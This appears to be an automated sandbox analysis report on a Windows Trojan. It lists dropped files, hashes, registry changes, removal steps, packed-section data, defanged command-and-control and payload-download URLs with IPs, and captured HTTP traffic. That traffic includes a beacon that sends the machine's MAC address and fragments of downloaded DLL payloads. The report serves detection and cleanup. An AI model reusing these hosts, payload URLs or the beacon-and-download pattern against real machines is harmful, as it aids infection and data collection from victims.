The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 72 F7 B1 07 EF 3D C4 60 2B 2F D5 80 99 C1 E7"
Dropped PE files
| MD5 | File path |
|---|---|
| cf1cdb854f655fd69597335e96de6792 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\4.tmp |
| 75434d6228364bfd1102c97edd346485 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFA27678.tmp |
| 1fad2419bc27270ef354b4cd18ea29fe | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFA6871.tmp |
| 73e40295ab0e0c740b114b9251042b87 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFA8273.tmp |
| bd79d4230e8cf291fefc260a1b1030c0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFBC263.TMP |
| d4424c25155d688f00f89bfa6d2bc534 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\~DFBIC753.TMP |
| 9484c04258830aa3c2f2a70eb041414c | c:\WINDOWS\system32\mswinsck.ocx |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
regsvr32.exe:1760
regsvr32.exe:2020
regsvr32.exe:1412
sc.exe:1164
sc.exe:896 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\~2662TXStartUpdateLog.tmp (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\homepro[1].txt (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA27678.tmpbak (11299 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFIC4966.tmp (11385 bytes)
%WinDir%\system\lock.dat (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\exitpop[1].txt (572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\remote.tmp (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\insert.tmp (2490 bytes)
%WinDir%\win.ini (4626 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\newDomain[1].txt (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBIC753.TMP (17716 bytes)
%WinDir%\lock.log (914 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yxjpq.tmp (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DFA2796.tmp (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\InsertWnd[1].txt (671 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\InsertWnd_enlc[1].dll (19378 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\safeen[1].txt (670 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\pubjc[1].txt (21084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA90A3.TMP (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\osm[1].dll (11953 bytes)
%Documents and Settings%\%current user%\Application Data\8901.dat (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\newcor[1].dll (34450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\yxjpq[1].txt (588 bytes)
%System%\lockie.ini (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\prosafe.tmp (845 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA3334.tmp (3383 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBC626.tmp (8314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jslist.tmp (692 bytes)
%System%\mswinsck.ocx (108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~prohome.tmp (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xsend.tmp (37241 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3.tmp (6262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcsaVas32.tmp (58 bytes)
%WinDir%\sys.dat (7212 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\jzjc[1].txt (154 bytes)
%System%\gdi30.dll (112 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jslist[1].txt (1405 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~tcjk.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\file[1].txt (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA8273.tmp (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFB3931.tmp (4418 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~url.tmp (454 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\domain.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\ic[1].htm (219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzjc.tmp (154 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\jzurl[1].txt (1224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5.tmp (294 bytes)
%System%\drivers\etc\hosts.tmp (2822 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\tfgg[1].txt (454 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\icdata[1].dll (18063 bytes)
%WinDir%\xdrq\lockie.ini (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\eb[1].txt (1721 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.tmp (19996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\InsertWnd_2345title_en[1].dll (16223 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\taian[1].ini (1006 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DUs6109.tmp (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\serList[1].txt (1521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\prosafe[1].txt (845 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\eb.tmp (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\serList.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA6871.tmp (11948 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzurl.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\urlRemote[1].txt (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4990.dat (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcVas32.tmp (388 bytes)
%WinDir%\Media\ad.ini (572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBC263.TMP (16428 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jzyxj[1].txt (1824 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 118784 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 122880 | 118784 | 115712 | 5.53848 | b72c9776fd3a7b7dc02aae29753eda36 |
| .rsrc | 241664 | 4096 | 512 | 2.49332 | 5d5a0a9007054812fac418762132b2f3 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
e4296b98643be0faa0f61186d64462cb
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://1stcncloudsave.cloud.ourwebpic.com/file.txt | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/yswm/taian.ini | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/osm.dll | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/ip.asp | |
| hxxp://1stcncloudc.cloud.ourwebpic.com/mactj.asp?mac=0050563B0E71&uname=taian | |
| hxxp://1stcncloudc.cloud.ourwebpic.com/mactj.asp?mac=0050563B0E71&uname=taian?bttmfiqeiqqepoar | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/newcor.dll | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/send/serList.txt | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/send/pubjc.txt | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com//send/safeen.txt | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/send/exitpop.txt | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/send/yxjk/yxjpq.txt | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/send/eb.txt | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/send/yxjk/jzyxj.txt | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/send/tfgg.txt | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/homepro.txt | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/send/prosafe.txt | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/send/addjs/jslist.txt | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/send/jzjc/jzjc.txt | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/send/jzjc/jzurl.txt | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/send/newDomain.txt | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/urlRemote.txt | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/yswm/Spid_jc_id.ini | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/send/jwico.txt | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/send/InsertWnd_enlc.dll | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/send/InsertWnd.txt | |
| hxxp://cdn.sp.cdntip.com/ic.asp | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/send/InsertWnd_2345title_en.dll | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/icdata.dll | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/send/ico2safe.txt | |
| hxxp://1stcncloudsave.cloud.ourwebpic.com/send/ico2.txt | |
| hxxp://yxtt.v138.net/send/prosafe.txt | 115.231.84.95 |
| hxxp://mactj.v138.net/mactj.asp?mac=0050563B0E71&uname=taian | 118.180.9.137 |
| hxxp://yxtt.v138.net/send/tfgg.txt | 115.231.84.95 |
| hxxp://mactj.v138.net/mactj.asp?mac=0050563B0E71&uname=taian?bttmfiqeiqqepoar | 118.180.9.137 |
| hxxp://www.topyouxi.net/homepro.txt | 218.92.226.46 |
| hxxp://user.yswm.net/yswm/Spid_jc_id.ini | 218.92.226.45 |
| hxxp://yxtt.v138.net/send/addjs/jslist.txt | 115.231.84.95 |
| hxxp://down.369k.net/icdata.dll | 218.92.226.45 |
| hxxp://yxtt.v138.net/send/eb.txt | 115.231.84.95 |
| hxxp://123.1313k.net/send/InsertWnd_enlc.dll | 218.92.226.45 |
| hxxp://yxtt.v138.net/send/InsertWnd.txt | 115.231.84.95 |
| hxxp://yxtt.v138.net/send/yxjk/yxjpq.txt | 115.231.84.95 |
| hxxp://123.1313k.net//send/safeen.txt | 218.92.226.45 |
| hxxp://www.topyouxi.net/urlRemote.txt | 218.92.226.46 |
| hxxp://yxtt.v138.net/send/jwico.txt | 115.231.84.95 |
| hxxp://yxtt.v138.net/send/jzjc/jzjc.txt | 115.231.84.95 |
| hxxp://yxtt.yswm.net/send/ico2.txt | 115.231.84.94 |
| hxxp://user.yswm.net/yswm/taian.ini | 218.92.226.45 |
| hxxp://yxtt.v138.net/send/pubjc.txt | 115.231.84.95 |
| hxxp://www.pc918.net/file.txt | 115.231.84.94 |
| hxxp://yxtt.v138.net/send/exitpop.txt | 115.231.84.95 |
| hxxp://yxtt.yswm.net/send/ico2safe.txt | 115.231.84.94 |
| hxxp://yxtt.v138.net/send/jzjc/jzurl.txt | 115.231.84.95 |
| hxxp://yxtt.v138.net/send/yxjk/jzyxj.txt | 115.231.84.95 |
| hxxp://1212.ip138.com/ic.asp | 119.167.164.43 |
| hxxp://yxtt.v138.net/send/newDomain.txt | 115.231.84.95 |
| hxxp://www.topyouxi.net/newcor.dll | 218.92.226.46 |
| hxxp://www.topyouxi.net/osm.dll | 218.92.226.46 |
| hxxp://www.yswm.net/ip.asp | 115.231.84.95 |
| hxxp://yxtt.v138.net/send/serList.txt | 115.231.84.95 |
| hxxp://yxtt.v138.net/send/InsertWnd_2345title_en.dll | 115.231.84.95 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /mactj.asp?mac=0050563B0E71&uname=taian HTTP/1.1
User-Agent: vb wininet
Host: mactj.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 25 Sep 2016 01:28:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSASBQB=FHLHNAPCOCFPGHGPGICDGFBD; path=/
Cache-Control: private
X-Cache: MISS from cache.51cdn.com
X-Via: 1.1 xinxiazai137:6 (Cdn Cache Server V2.0)
Connection: keep-alive
err!HTTP/1.1 200 OK..Date: Sun, 25 Sep 2016 01:28:38 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 4..Content-Type: text/html..Set-Cookie: ASPSESSIONIDQCSASBQB=FHLHNAPCOCFPGHGPGICDGFBD; path=/..Cache-Control: private..X-Cache: MISS from cache.51cdn.com..X-Via: 1.1 xinxiazai137:6 (Cdn Cache Server V2.0)..Connection: keep-alive..err!..
GET //send/safeen.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.1313k.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 08:57:04 GMT
Content-Length: 2942
Content-Type: text/plain
Last-Modified: Sat, 24 Sep 2016 02:08:11 GMT
Accept-Ranges: bytes
ETag: "9e7c6380816d21:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh92:3 (Cdn Cache Server V2.0), 1.1 jsycdx41:6 (Cdn Cache Server V2.0)
Connection: keep-alive
QW...NONNOL=.....MR]^=.............Q\.=.NIHS...!..ATA.....S...=..W..s@DILHHNDD=...FV\..WHENKJ=....U]].WDLJJIE=....U]].WHEOKH=.....^\TWHEOKE=......_U.HENLK=.......V..EOKJ=LMMLMO..\r.LMMEKS..=DQW[..s..NOMNS.......\V.R..S...=..ZV...JMKMWHE..S...qJF....S...=.....Q]=...S=..."...TJsR...B=R...N".P[W.S...R...=...UG....R......!..XVFS...R........TrD..S.....S...LAr.D...S...=S...^AUS...=SDOM..L.^_s.....S....."MRZR.....S...R...EW].=S......S....A....."...=HSSRVS^.S...=......Q...N=SLJNS...!..A.@..@LMH=OKISWS.r.OLODDS...=...FK....=OLJJJL!PU...HK=....SL...PC.P..=SMJDLDS...q..OON...=.SLPQP.QP=ONOON..=DXWV...S...=DK..S....r.......S...!..P\B.S..=S..S...#KZZ..ES..=.......Q\.=.....S...M.X\ZRD.R.....S...q.J.KMEMS...=....YV...S...=.@PVR..........=NLPTLX\W..S...=...OW[......R.."...!..\W@R....R...=..._Q[..........O..\rG.SHL.....S...q^\.....*......#_X.ES...=.....L.^HV.....S...=...I[].S.....S...".XS].HNNS....=XRT...=........S...q.T...S..=....V[..P..=.OMLHMHS[.ZY\=..JJMI=S...MR\sS....S...=...PFZ..R...R.......r.......S...!L.T_R..S...=.....IWWZ.........S...qSB..W.....S.."TWUR..S...=..DX[MR]^=DMNKMJJO=XS[...IO=DLKNEHOW"Z...KIHJ=..OMSTZU.^R=.....SMJDP[MR]^=BJLLMNPMKQR#...LMNPMDDD=BVSS..sSON...S...N..\^P...ROLE=....MBEY..S...=...O..PTVOES...R......]rC...S.....S....TA...=S......L.^_.....=.......MR]^=....S.....L.^_s....WDMDMET"._@DWDMDLOI=.....Er.MDOLE=S......G.P..=.......\PR.r.MDOEJ=.....L.TQR.S...=DLNHQZ#FEDS..S...=...L.XB....=S........^\VS...=LONS....D.P..RBJLMEIPVQT.r.H..S...=.....C..WDIDNLJHL=XRZ...=..........HMH]F.....S...=...YS\....WS.....
<<< skipped >>>
GET /send/InsertWnd_enlc.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.1313k.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 22:35:39 GMT
Content-Length: 124416
Content-Type: application/x-msdownload
Last-Modified: Fri, 08 Jul 2016 12:31:29 GMT
Accept-Ranges: bytes
ETag: "5828f9a614d9d11:a4e7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:2 (Cdn Cache Server V2.0), 1.1 jsycdx41:5 (Cdn Cache Server V2.0)
Connection: keep-alive
/9.20}}}y}}}..}a.c123}}}=}}}}}}abc123}}}}}}}}}}abc123}}}}}}}.}}al|.<3.t.\.|1.\)....BA.....]......CSW....]..]92.A..UW.ppwY}}}}}}aO...Z.............!.G.....n.......#.......#.........I...........m=?.P...r#j.....m=%.[...r#l.....0.RZZ...}}}}}}}abc123}}}-8}}1|~a..Ne3}}}}}}}.}.@ib:23.|}}m}}}}yaR.423my}}.x}}}}qbs123.}}x}|}}}}agc023}}}}}{}}m}abc121}=|}}m}}m}abc!23m}}}}}}m}}a~.42[}}}..x}=.}ab.42.|}}}}}}}}}abc123}}}..x}e}}abc123}}}}}}}}}}abc123}}}}}}}}}}ar.42{}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}a73i.3}}}}}y}}m}abc123y}}}}}}}}}abc12.}}.(-%L}}}ab.023my}}.|}}y}abc123}}}}}}}=}}.L.B@P}}}}m}}}.xabe123.|}}}}}}}}abc12s}}.}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}NSMHa73i.>tsw.....J....42..|}}'x}[q}!x`1.............,.....p...~QW..F.!ZxiQ.{x.$Z..GA..i....z3. ......`..f.T.B..x..pj>P..zh...jX.Q......c.)g;...........'C......;7.$.&.....Q.l...*q ..DF.@..L...Vb...FVIr........=.....j....y...Zw..y..i..Y.........t...".........t..M......6..A..<.v.}..{.........@..4.B..I../..m..L...a.j..H....8P.NR...n..X........$T.Jx. $..C.L.O..,~L.....T`....jv5=2..........JZ.*WU ..R0...C.>w.!Y...v.9..sg..{. ..:_..A..c.....)*...Sz...CEi..\yMu....e..)..5...D...C..z....G..J]....oi..3.k.h-....>..V..."..t.P'.~.`..Y.R.
<<< skipped >>>
GET /file.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.pc918.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 03 Aug 2016 07:55:10 GMT
Content-Length: 199
Content-Type: text/plain
Last-Modified: Fri, 20 May 2016 16:38:12 GMT
Accept-Ranges: bytes
ETag: "a86150b6b2d11:a470"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:8105 (Cdn Cache Server V2.0), 1.1 jinh95:4 (Cdn Cache Server V2.0)
Connection: keep-alive
[Basic]..Url1=hXXp://VVV.topyouxi.net/osm.dll..Url2=hXXp://down.v718.com/osm.dll..md5=65F7B70B548389ADE039D1804C893694..Filepath=..dll=..ExeName=..config=hXXp://user.yswm.net/yswm/..Jm=1..time=6000..HTTP/1.1 200 OK..Date: Wed, 03 Aug 2016 07:55:10 GMT..Content-Length: 199..Content-Type: text/plain..Last-Modified: Fri, 20 May 2016 16:38:12 GMT..Accept-Ranges: bytes..ETag: "a86150b6b2d11:a470"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Age: 1..X-Cache: HIT from cache.51cdn.com..X-Via: 1.1 jsyc109:8105 (Cdn Cache Server V2.0), 1.1 jinh95:4 (Cdn Cache Server V2.0)..Connection: keep-alive..[Basic]..Url1=hXXp://VVV.topyouxi.net/osm.dll..Url2=hXXp://down.v718.com/osm.dll..md5=65F7B70B548389ADE039D1804C893694..Filepath=..dll=..ExeName=..config=hXXp://user.yswm.net/yswm/..Jm=1..time=6000....
GET /yswm/taian.ini HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: user.yswm.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 12:29:07 GMT
Content-Length: 503
Content-Type: application/vnd.rn
Last-Modified: Fri, 15 Apr 2016 01:58:31 GMT
Accept-Ranges: bytes
ETag: "3679b94fba96d11:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:5 (Cdn Cache Server V2.0), 1.1 jinh94:6 (Cdn Cache Server V2.0)
Connection: keep-alive
[UnionID]..Url=..Guide=..Sgdh=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sgtp=..RDC=..cpush=..soso=..lm=..JianGuanUrl=taian.htm....[Pro]..Name=....[Close]..Url=..Sgdh=..Guide=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sgtp=..RDC=..cpush=..jzyxj=..app=..send=..urltcpai=....[Index]..Safe=newlock@onepro....[UserSet]..Blk=..Webfile=..Close=sogoujcclose@xcyclose@lsclose@qqtclose@softdlclose@rndclose@qzoneclose@htcclose@baiduclose@qqclose@icojc@addjc@tcclose@spslclose@titleclose..noweb=..prisafe=..HTTP/1.1 200 OK..Date: Sat, 24 Sep 2016 12:29:07 GMT..Content-Length: 503..Content-Type: application/vnd.rn..Last-Modified: Fri, 15 Apr 2016 01:58:31 GMT..Accept-Ranges: bytes..ETag: "3679b94fba96d11:a652"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Age: 1..X-Cache: HIT from cache.51cdn.com..X-Via: 1.1 jsyc109:5 (Cdn Cache Server V2.0), 1.1 jinh94:6 (Cdn Cache Server V2.0)..Connection: keep-alive..[UnionID]..Url=..Guide=..Sgdh=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sgtp=..RDC=..cpush=..soso=..lm=..JianGuanUrl=taian.htm....[Pro]..Name=....[Close]..Url=..Sgdh=..Guide=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sgtp=..RDC=..cpush=..jzyxj=..app=..send=..urltcpai=....[Index]..Safe=newlock@onepro....[UserSet]..Blk=..Webfile=..Close=sogoujcclose@xcyclose@lsclose@qqtclose@softdlclose@rndclose@qzoneclose@htcclose@baiduclose@qqclose@icojc@addjc@tcclose@spslclose@titleclose..noweb=..prisafe=......
<<< skipped >>>
GET /yswm/taian.ini HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: user.yswm.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 12:29:07 GMT
Content-Length: 503
Content-Type: application/vnd.rn
Last-Modified: Fri, 15 Apr 2016 01:58:31 GMT
Accept-Ranges: bytes
ETag: "3679b94fba96d11:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:5 (Cdn Cache Server V2.0), 1.1 jinh94:6 (Cdn Cache Server V2.0)
Connection: keep-alive
[UnionID]..Url=..Guide=..Sgdh=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sgtp=..RDC=..cpush=..soso=..lm=..JianGuanUrl=taian.htm....[Pro]..Name=....[Close]..Url=..Sgdh=..Guide=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sgtp=..RDC=..cpush=..jzyxj=..app=..send=..urltcpai=....[Index]..Safe=newlock@onepro....[UserSet]..Blk=..Webfile=..Close=sogoujcclose@xcyclose@lsclose@qqtclose@softdlclose@rndclose@qzoneclose@htcclose@baiduclose@qqclose@icojc@addjc@tcclose@spslclose@titleclose..noweb=..prisafe=..HTTP/1.1 200 OK..Date: Sat, 24 Sep 2016 12:29:07 GMT..Content-Length: 503..Content-Type: application/vnd.rn..Last-Modified: Fri, 15 Apr 2016 01:58:31 GMT..Accept-Ranges: bytes..ETag: "3679b94fba96d11:a652"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Age: 1..X-Cache: HIT from cache.51cdn.com..X-Via: 1.1 jsyc109:5 (Cdn Cache Server V2.0), 1.1 jinh94:6 (Cdn Cache Server V2.0)..Connection: keep-alive..[UnionID]..Url=..Guide=..Sgdh=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sgtp=..RDC=..cpush=..soso=..lm=..JianGuanUrl=taian.htm....[Pro]..Name=....[Close]..Url=..Sgdh=..Guide=..Bho=..Tanghulu=..Ico=..NewExitPOP=..Sgtp=..RDC=..cpush=..jzyxj=..app=..send=..urltcpai=....[Index]..Safe=newlock@onepro....[UserSet]..Blk=..Webfile=..Close=sogoujcclose@xcyclose@lsclose@qqtclose@softdlclose@rndclose@qzoneclose@htcclose@baiduclose@qqclose@icojc@addjc@tcclose@spslclose@titleclose..noweb=..prisafe=......
<<< skipped >>>
GET /yswm/Spid_jc_id.ini HTTP/1.1
User-Agent: RookIE/1.0
Host: user.yswm.net
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 05:12:33 GMT
Content-Length: 6
Content-Type: application/vnd.rn
Last-Modified: Mon, 12 Oct 2015 02:30:03 GMT
Accept-Ranges: bytes
ETag: "4c19d3e6954d11:a3bc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh93:8103 (Cdn Cache Server V2.0), 1.1 jinh94:6 (Cdn Cache Server V2.0)
Connection: keep-alive
9904..HTTP/1.1 200 OK..Date: Sat, 24 Sep 2016 05:12:33 GMT..Content-Length: 6..Content-Type: application/vnd.rn..Last-Modified: Mon, 12 Oct 2015 02:30:03 GMT..Accept-Ranges: bytes..ETag: "4c19d3e6954d11:a3bc"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Age: 1..X-Cache: HIT from cache.51cdn.com..X-Via: 1.1 jinh93:8103 (Cdn Cache Server V2.0), 1.1 jinh94:6 (Cdn Cache Server V2.0)..Connection: keep-alive..9904....
GET /icdata.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.369k.net
Connection: Keep-Alive
HTTP/1.1 200 OK
